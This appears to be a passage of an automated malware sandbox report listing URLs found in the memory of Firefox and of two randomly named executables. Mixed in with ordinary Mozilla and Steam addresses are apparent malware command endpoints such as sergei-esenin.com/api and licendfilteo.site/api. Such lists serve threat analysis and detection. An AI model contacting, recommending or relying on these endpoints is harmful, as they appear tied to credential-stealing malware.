Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3136131326.0000028826A91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabbrowser.newtabpage.activity-stream.discoverystr
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morecleanUpTopRecImpressionPref/activeStories
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsdiscoverystream.personalization.enabled
Source: firefox.exe, 00000017.00000002.3173331545.000002882DFCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000017.00000003.2983132390.000002882376F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000017.00000002.3142479922.000002882B1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000017.00000002.3142479922.000002882B1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000017.00000002.3142479922.000002882B1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/translations-panel-view-default
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/translations-panel-view-defaultexperimental-features-web-gpu2
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 00000017.00000002.3085847545.0000028813611000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeDownloadsNumber
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/api
Source: firefox.exe, 00000017.00000002.3117080621.0000028824396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%primeBackground/extension.wake
Source: firefox.exe, 00000017.00000002.3113740588.0000028823D67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3134981536.000002882600A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825D85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.000002882432A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.000002882600E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comchrome
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comUrlClassifierExceptionListService7b5096a3-582a-437a-8d3a-7edd47030f
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestmedia.videocontrols.picture-in-picture.urlbar-butt
Source: firefox.exe, 00000017.00000002.3090755070.000002881F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000017.00000002.3090755070.000002881F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3109502622.0000028823575000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/#
Source: firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comcreateContentPrincipalFromOrigindevice-connected-notificationaccount-
Source: f84005b97f.exe, 00000007.00000003.2823586577.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/&J
Source: f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823853270.00000000014CE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2813057343.000000000143E000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: f84005b97f.exe, 00000007.00000003.2823853270.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823586577.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api)
Source: f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiL
Source: f84005b97f.exe, 00000007.00000003.2823853270.00000000014CE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apienR
Source: firefox.exe, 00000017.00000002.3179092949.000002882E2D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Endpoint
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824356000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3100093809.00000288230EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B0E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_CHANGE
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_CHANGEsection.highlights.includePocket_getRe
Source: firefox.exe, 00000017.00000002.3119588541.00000288245BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3122697624.0000028824B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882510C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000017.00000002.3123219764.0000028825105000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3122697624.0000028824B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882510C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
